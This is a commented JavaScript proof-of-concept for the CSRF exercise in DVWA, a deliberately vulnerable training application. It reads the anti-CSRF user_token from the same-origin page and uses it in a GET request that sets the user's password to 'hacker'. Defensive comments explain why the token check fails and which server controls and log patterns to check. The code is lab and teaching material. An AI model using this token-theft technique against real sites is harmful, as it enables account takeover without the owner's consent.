//
// PoC: CSRF (for the DVWA "high" security level)
// Author: Bonghwan Choi (stayp05@secuacademy.com)
//
// Shared request handle: req1() stores its XMLHttpRequest here, and req2() reads
// the response from it before reusing the variable for the follow-up request.
var xhr;
// Relative path, so both requests go to the origin this script is running on.
// That is why the script can read the response body (and the token in it):
// the same-origin policy only blocks reads of cross-origin responses.
var dvwa_csrf_url = '/dvwa/vulnerabilities/csrf/';
// Start the two-step flow as soon as the script is evaluated. req1 is a hoisted
// function declaration, so calling it above its definition works.
req1();
/**
 * Step 1 of the PoC: request the DVWA CSRF page so that req2() can read the
 * anti-CSRF token embedded in it.
 *
 * The request handle is kept in the shared `xhr` variable because req2() is
 * registered as a plain callback and reads the response from that variable.
 *
 * Defensive note: this step only works because the script runs on the same
 * origin as the target page. A per-request token does not protect a
 * state-changing action once same-origin script can read the page that
 * carries the token.
 */
function req1() {
  var pageRequest = new XMLHttpRequest();
  xhr = pageRequest;
  // Handler is attached before open(), as in the original; req2 ignores every
  // state except a completed 200 response.
  pageRequest.onreadystatechange = req2;
  pageRequest.open('GET', dvwa_csrf_url);
  pageRequest.send();
}
/**
 * Step 2 of the PoC: once the page fetched by req1() has loaded, parse it,
 * read the `user_token` field and send the password-change request with that
 * token attached.
 *
 * Called for every readystatechange of the first request; does nothing until
 * the response is complete (readyState 4) with HTTP status 200.
 *
 * What a defender should take from this block:
 *  - The token check is satisfied with a token read from the victim's own
 *    page, so the token alone is not a sufficient control when script can run
 *    on the application's origin. The injection point has to be fixed too.
 *  - The password change here is a GET with the new password in the query
 *    string and no current-password field. Requiring the current password
 *    (re-authentication) for this action and accepting it only via POST are
 *    the controls to verify on the server side.
 *  - In logs, the pattern is a GET of the CSRF page immediately followed by a
 *    GET of the same path carrying password_new/password_conf/user_token.
 */
function req2() {
  // Guard clause: skip intermediate states and non-200 responses.
  if (xhr.readyState !== 4 || xhr.status !== 200) {
    return;
  }

  // Parse the fetched page as an inert document so the token field can be
  // looked up by name. Throws if no element named "user_token" exists.
  var tokenPage = new DOMParser().parseFromString(xhr.responseText, 'text/html');
  var CSRFtoken = tokenPage.getElementsByName("user_token")[0].value;
  alert('Found the token: ' + CSRFtoken);

  // Reuse the shared handle for the follow-up request. No handler is attached,
  // so the outcome of this request is never inspected.
  xhr = new XMLHttpRequest();
  xhr.open('GET', dvwa_csrf_url + '?password_new=hacker&password_conf=hacker&Change=Change&user_token=' + CSRFtoken);
  xhr.send();
}